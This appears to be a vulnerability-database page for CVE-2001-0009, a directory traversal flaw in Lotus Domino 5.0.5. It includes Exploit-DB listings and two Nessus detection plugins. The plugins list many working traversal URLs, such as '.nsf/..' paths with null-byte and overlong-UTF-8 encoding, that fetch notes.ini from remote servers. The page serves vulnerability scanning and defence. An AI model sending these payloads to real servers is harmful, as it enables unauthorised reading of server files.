Vulnerabilities > CVE-2001-0009 - Unspecified vulnerability in Lotus Domino Server
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
Directory traversal vulnerability in Lotus Domino 5.0.5 web server allows remote attackers to read arbitrary files via a .. attack.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 4 |
Exploit-Db
description Lotus Domino Server 5.0.x Directory Traversal Vulnerability (2). CVE-2001-0009. Remote exploits for multiple platform id EDB-ID:20530 last seen 2016-02-02 modified 2001-01-05 published 2001-01-05 reporter Georgi Guninski source https://www.exploit-db.com/download/20530/ title Lotus Domino Server 5.0.x - Directory Traversal Vulnerability 2 description Lotus Domino Server 5.0.x Directory Traversal Vulnerability (1). CVE-2001-0009. Remote exploits for multiple platform id EDB-ID:20529 last seen 2016-02-02 modified 2001-01-15 published 2001-01-15 reporter Michael Smith source https://www.exploit-db.com/download/20529/ title Lotus Domino Server 5.0.x - Directory Traversal Vulnerability 1
Nessus
NASL family Web Servers NASL id NOTESINICHECK.NASL description Using a specially crafted request URL containing last seen 2020-06-01 modified 2020-06-02 plugin id 12248 published 2004-05-25 reporter This script is Copyright (C) 2004-2018 Net-Square Solutions Pvt Ltd. source https://www.tenable.com/plugins/nessus/12248 title IBM Lotus Domino Server Crafted .nsf Request Traversal Arbitrary File Access code # # Copyright (C) 2000 - 2009 Net-Square Solutions Pvt Ltd. # By: Hemil Shah # Desc: This script will check for the notes.ini file in the remote web server. # Changes by Tenable: # - Revised plugin title, added VDB refs, replaced bad SF link, changed family, added solution (9/2/09) include("compat.inc"); if(description) { script_id(12248); script_version ("1.16"); script_cve_id("CVE-2001-0009"); script_bugtraq_id(2173); script_name(english:"IBM Lotus Domino Server Crafted .nsf Request Traversal Arbitrary File Access"); script_set_attribute(attribute:"synopsis", value: "The remote web server is susceptible to a directory traversal attack." ); script_set_attribute(attribute:"description", value: "Using a specially crafted request URL containing '.nsf/..', the installed version of Lotus Domino on the remote host can be abused to reveal the contents of arbitrary files on the server." ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jan/68" ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jan/148" ); script_set_attribute(attribute:"solution", value: "Upgrade to version 5.0.6a or higher." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2004/05/25"); script_set_attribute(attribute:"vuln_publication_date", value: "2001/01/05"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_summary(english:"notes.ini checker"); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2004-2020 Net-Square Solutions Pvt Ltd."); script_family(english:"Web Servers"); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); exit(0); } # start script include("http_func.inc"); include("http_keepalive.inc"); port = get_http_port(default:80, embedded:TRUE); if(! get_port_state(port)) exit(0); if ( get_kb_item("www/no404/" + port ) ) exit(0); banner = get_http_banner(port:port); if ( "Domino" >!< banner ) exit(0); DEBUG = 0; req = http_get(item:"../../../../whatever.ini", port:port); res = http_keepalive_send_recv(port:port, data:req); if ( res == NULL ) exit(0); if (ereg(pattern:"^HTTP/[01]\.[01] 200 ", string:res) ) exit (0); dirs[0] = "/%00%00.nsf/../lotus/domino/notes.ini"; dirs[1] = "/%00%20.nsf/../lotus/domino/notes.ini"; dirs[2] = "/%00%c0%af.nsf/../lotus/domino/notes.ini"; dirs[3] = "/%00...nsf/../lotus/domino/notes.ini"; dirs[4] = "/%00.nsf//../lotus/domino/notes.ini"; dirs[5] = "/%00.nsf/../lotus/domino/notes.ini"; dirs[6] = "/%00.nsf/..//lotus/domino/notes.ini"; dirs[7] = "/%00.nsf/../../lotus/domino/notes.ini"; dirs[8] = "/%00.nsf.nsf/../lotus/domino/notes.ini"; dirs[9] = "/%20%00.nsf/../lotus/domino/notes.ini"; dirs[10] = "/%20.nsf//../lotus/domino/notes.ini"; dirs[11] = "/%20.nsf/..//lotus/domino/notes.ini"; dirs[12] = "/%c0%af%00.nsf/../lotus/domino/notes.ini"; dirs[13] = "/%c0%af.nsf//../lotus/domino/notes.ini"; dirs[14] = "/%c0%af.nsf/..//lotus/domino/notes.ini"; dirs[15] = "/...nsf//../lotus/domino/notes.ini"; dirs[16] = "/...nsf/..//lotus/domino/notes.ini"; dirs[17] = "/.nsf///../lotus/domino/notes.ini"; dirs[18] = "/.nsf//../lotus/domino/notes.ini"; dirs[19] = "/.nsf//..//lotus/domino/notes.ini"; dirs[20] = "/.nsf/../lotus/domino/notes.ini"; dirs[21] = "/.nsf/../lotus/domino/notes.ini"; dirs[22] = "/.nsf/..///lotus/domino/notes.ini"; dirs[23] = "/.nsf%00.nsf/../lotus/domino/notes.ini"; dirs[24] = "/.nsf.nsf//../lotus/domino/notes.ini"; report = ""; for (i=0; dirs[i]; i++) { req = http_get(item:dirs[i], port:port); res = http_keepalive_send_recv(port:port, data:req); if ( res == NULL ) exit(0); if(ereg(pattern:"^HTTP/[01]\.[01] 200 ", string:res) ) { if ("DEBUG" >< res) { report = report + string("\nSpecifically, the request for ", dirs[i], " appears\n"); report = report + string("to have retrieved the notes.ini file."); security_warning(port:port, extra:report); exit(0); } } }NASL family Web Servers NASL id DOMINO_TRAVERSAL.NASL description It is possible to read arbitrary files on the remote server by prepending %00%00.nsf/../ in front of it. last seen 2020-06-01 modified 2020-06-02 plugin id 11344 published 2003-03-10 reporter This script is Copyright (C) 2003-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/11344 title IBM Lotus Domino Directory Traversal Arbitrary File Access code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(11344); script_version("1.23"); script_cvs_date("Date: 2018/07/10 14:27:33"); script_cve_id("CVE-2001-0009"); script_bugtraq_id(2173); script_name(english:"IBM Lotus Domino Directory Traversal Arbitrary File Access"); script_summary(english:"\..\..\file.txt"); script_set_attribute(attribute:"synopsis", value: "Arbitrary files may be read on the remote host."); script_set_attribute(attribute:"description", value: "It is possible to read arbitrary files on the remote server by prepending %00%00.nsf/../ in front of it."); script_set_attribute(attribute:"solution", value: "Upgrade to a newer version."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value:"2003/03/10"); script_set_attribute(attribute:"vuln_publication_date", value:"2001/01/05"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:lotus_domino"); script_end_attributes(); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc."); script_family(english:"Web Servers"); script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl"); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = get_http_port(default:80, embedded: 0); banner = get_http_banner(port:port); if ( ! banner ) exit(0); if ( "Lotus Domino" >!< banner ) exit(0); banner = get_http_banner(port:port); if(egrep(pattern:"Lotus-Domino/5\.0\.[0-6][^0-9]", string:banner)) { security_warning(port); exit (0); } # Test for the flaw anyway exts = make_list(".nsf", ".box", ".nt4"); vars = make_list("%00", "%00%00", "%20", "%C0%AF", "%c0%af%00", "%20%00", "/.."); ups = make_list("/../../../../../", "//../../../../../"); foreach ext (exts) foreach tvar (vars) foreach up (ups) { url = string(tvar, ext, up, "lotus/domino/notes.ini"); w = http_send_recv3(port:port, method: "GET", item:url); if (isnull(w)) exit(0); r = tolower(w[2]); if(("httphost" >< r) || ("resultsdirectory" >< r) || ("numaddlocalreplica" >< r) || ("normalmessagesize" >< r) || ("sharednotes" >< r) || ("[notes]" >< r) || ("notesprogram" >< r)){ security_warning(port); exit(0); } }
References
- http://www.osvdb.org/1703
- http://www.osvdb.org/1703
- http://www.securityfocus.com/archive/1/154537
- http://www.securityfocus.com/archive/1/154537
- http://www.securityfocus.com/archive/1/155124
- http://www.securityfocus.com/archive/1/155124
- http://www.securityfocus.com/bid/2173
- http://www.securityfocus.com/bid/2173
- https://exchange.xforce.ibmcloud.com/vulnerabilities/5899
- https://exchange.xforce.ibmcloud.com/vulnerabilities/5899